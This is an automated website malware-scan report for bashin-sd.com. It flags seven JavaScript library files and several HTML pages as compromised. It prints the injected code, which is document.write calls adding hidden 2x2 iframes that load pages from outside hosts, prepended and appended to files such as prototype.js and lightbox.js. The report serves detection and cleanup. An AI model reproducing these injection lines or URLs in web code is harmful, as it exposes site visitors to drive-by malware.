Malware Scanner report for bashin-sd.com

Malicious/Suspicious/Total urls checked: 7/0/15

7 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "bashin-sd.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/27/27

27 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bashin-sd.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://bashin-sd.com/	200 OK Content-Length: 8962 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/js/swfobject.js	200 OK Content-Length: 7370 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if ... 3107 bytes are skipped ...onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361>
http://bashin-sd.com/Scripts/swfobject_modified.js	200 OK Content-Length: 22185 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", ... 3656 bytes are skipped ... setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361>
http://bashin-sd.com/contacts.html	200 OK Content-Length: 6460 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/./js/inclu.js	200 OK Content-Length: 4842 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var sth=/\w+\s/; var word=/\w+/; var passreg=/^[\w_\d@\.\$-]+$/; var emlreg=/^\w+([-+.']\w+)@\w+([-.]\w+)*\.\w+([-.]\w ... 4988 bytes are skipped ...i; ctl1=getCtl(tempctl); if(!ctl1) continue; if(i%2==0) { ctl1.className="tdf"; } else { ctl1.className="tds"; } } ct="tr"+ind; ct1= getCtl(ct); ct1.className="tdsel"; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports: AntiVir HTML/TwitScroll.B Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG TrendMicro-HouseCall TROJ_GEN.F47V1105 Emsisoft Trojan.Iframe.CEG (B) Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361>
http://bashin-sd.com/./js/contact.js	200 OK Content-Length: 1007 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); function checkContact() { ctl = getCtl('name'); if(ctl.value.search(sth)==-1) { alert("Enter Name");< ... 30 bytes are skipped ...n false; } ctl = getCtl('email'); if(ctl.value.search(sth)==-1) { alert("Enter Email"); ctl.focus(); return false; } if(ctl.value.search(emlreg)==-1) { alert("Enter A Valid Email"); ctl.focus(); return false; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361>
http://bashin-sd.com/services.html	200 OK Content-Length: 4937 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/gallery.html	200 OK Content-Length: 10866 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/js/prototype.js	200 OK Content-Length: 48083 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var Prototype = { Version: '1.4.0', ScriptFragment: '(?:<script.?>)((\n\|\r\|.)?)(?:<\/script>)', empt ... 3497 bytes are skipped ...lueT += element.offsetTop \|\| 0; valueL += element.offsetLeft \|\| 0; if (element.offsetParent == document.body) if (Element.getStyle(element, 'position') == 'absolute') break; element = element.offsetParent; } while (element); return [valueL, valueT]; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Avast JS:Iframe-AMJ [Trj] TrendMicro-HouseCall TROJ_GEN.F47V0321 Norman Iframe.UW GData JS:Iframe-AMJ Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361>
http://bashin-sd.com/js/scriptaculous.js?load=effects	200 OK Content-Length: 2642 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var Scriptaculous = { Version: '1.5.1', require: function(libraryName) { document.write('<script type="te ... 579 bytes are skipped ...ace(/scriptaculous\.js(\?.)?$/,''); var includes = s.src.match(/\?.load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load(); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361>
http://bashin-sd.com/js/lightbox.js	200 OK Content-Length: 23871 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361></iframe>'); var fileLoadingImage = "images/loading.gif"; var fileBottomNavCloseImage = "images/closelabel.gif"; var animate = true; va ... 3558 bytes are skipped ...ashEmbeds[i].style.visibility = "hidden"; } } function pause(ms){ var date = new Date(); curDate = null; do{var curDate = new Date();} while( curDate - date < ms); } function initLightbox() { myLightbox = new Lightbox(); } Event.observe(window, 'load', initLightbox, false); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/awas.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/awas.html?j=1235361> Hidden iFrame found. size: 2x2 src: http://drannettesilber.com/wzoi.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://drannettesilber.com/wzoi.html?i=1235361> Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?j=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?j=1235361>
http://bashin-sd.com/about-us.html	200 OK Content-Length: 5222 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/index.html	200 OK Content-Length: 8962 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://big-cc-tx.org/ceei.html?i=1235361 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://big-cc-tx.org/ceei.html?i=1235361>
http://bashin-sd.com/test404page.js	404 Not Found Content-Length: 1148 Content-Type: text/html	clean
http://bashin-sd.com/images/gallery/pic1-big.jpg	200 OK Content-Length: 300469 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bashin-sd.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 19:38:20 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Content-Length: 8962
Content-Type: text/html
Last-Modified: Sat, 09 Mar 2013 06:01:25 GMT

...8962 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: bashin-sd.com
Referer: http://www.google.com/search?q=bashin-sd.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for bashin-sd.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools